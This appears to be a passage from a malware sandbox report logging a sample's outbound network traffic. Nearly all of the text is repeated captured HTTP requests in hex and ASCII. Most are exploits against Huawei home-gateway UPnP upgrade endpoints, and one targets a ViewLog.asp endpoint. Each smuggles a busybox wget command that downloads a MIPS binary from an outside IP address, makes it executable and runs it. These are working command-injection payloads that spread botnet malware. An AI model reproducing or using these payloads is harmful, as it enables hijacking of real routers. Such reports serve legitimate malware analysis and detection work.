                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:54.310545921 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:43.462268114 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              227192.168.2.135056694.120.249.1978080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:07.072514057 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              228192.168.2.1350696156.230.23.5337215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:08.181291103 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:09.798644066 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:11.718496084 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:15.654544115 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:23.334481001 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:38.694488049 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
